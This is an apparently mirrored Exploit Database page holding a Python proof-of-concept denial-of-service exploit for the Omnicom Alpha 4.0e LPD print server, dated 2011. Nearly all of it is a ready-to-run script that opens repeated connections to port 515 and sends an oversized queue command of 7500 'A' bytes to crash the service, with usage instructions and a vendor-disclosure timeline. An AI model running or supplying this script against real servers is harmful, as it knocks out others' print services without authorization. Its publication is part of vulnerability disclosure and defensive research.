Omnicom Alpha 4.0e LPD Server – Denial of Service

• Exploit Database
• 111 阅读

• 作者： Craig Freyman
  日期： 2011-08-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17601/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  #!/usr/bin/python #Title: Omnicom Alpha 4.0e LPD Server DoS #Author: Craig Freyman (@cd1zz) #Software Download: http://www.omnicomtech.com/download/bin/lpd.exe #Tested on: Windows XP SP3 (English), Server 2003 SP2 (English) #Dates: Bug Found 7/27/2011, Vendor Notified 8/1/2011, Vendor Responded 8/2/2011, Vendor approved release 8/3/2011 #Notes: For this exploit to work, you must know the name of a printer queue on the server.   import socket,sys,time   if len(sys.argv) < 3: print "[-]Usage: %s <target addr> <queue name>" % sys.argv[0] sys.exit(0)   target = sys.argv[1] queue = sys.argv[2]   counter = 1 crash = "\x41" * 7500   s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)   try: while counter<=50: print "[*] Left jab "+str(counter)+" times." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target,515)) s.send("\x02"+queue+" "+crash+"LF") time.sleep(.25) counter+=1 except: print "[-] "+target+" has been knocked out with a right hook!" sys.exit(0)